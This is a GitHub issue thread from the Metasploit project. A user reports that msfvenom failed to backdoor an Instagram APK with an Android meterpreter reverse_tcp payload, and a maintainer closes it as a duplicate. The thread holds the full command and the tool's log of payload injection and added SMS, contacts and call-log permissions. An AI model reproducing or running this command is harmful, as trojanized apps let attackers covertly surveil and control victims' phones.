### ISSUE TITLE
Msfvenom apk merging not working 

### ISSUE THREAD

**Issue by Soumik69420** [rapid7/metasploit-framework#16443] opened 2022-04-11 16:13 UTC
## Steps to reproduce
i went to the console and wrote the following command msfvenom -x /home/soumik/Downloads/APKPure(Instagram_v229.0.0.17.118_apkpure.com).apk -p android/meterpreter/reverse_tcp lhost=192.168.0.3 lport=6969 > backdoor.apk

## Were you following a specific guide/tutorial or reading documentation?
No

## Expected behavior
It should put the 2 apks togheter and output the apk
What should happen?

## Current behavior

I get this message Using APK template: /home/soumik/Downloads/APKPure(Instagram_v229.0.0.17.118_apkpure.com).apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.apkpure.aegon.chndx
[*] Loading /tmp/d20220411-22056-7mbnt2/original/smali/com/apkpure/aegon/application/AegonApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220411-22056-7mbnt2/output.apk
[-] I: Using Apktool 2.5.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Lc/q/e/t/a$b;-><init>(Ljava/lang/reflect/Type;Ljava/lang/reflect/Type;[Ljava/lang/reflect/Type;)V
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1046)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:345)
        at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:300)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:61)
        at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:36)
        at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:420)
        at brut.androlib.Androlib.buildSources(Androlib.java:351)
        at brut.androlib.Androlib.build(Androlib.java:303)
        at brut.androlib.Androlib.build(Androlib.java:270)
        at brut.apktool.Main.cmdBuild(Main.java:259)
        at brut.apktool.Main.main(Main.java:85)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x39
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1319)
        at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1042)
        ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65563
        at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
        at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
        at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1279)
        ... 11 more

Error: Unable to rebuild apk with apktool

### Metasploit version

It's msfvenom so i'm not sure how u get it

**Comment by bcoles** [comment] 2022-04-11 16:18
Dupe of #16338.

**Closed by bcoles** 2022-04-11 16:18 UTC
Labels: bug
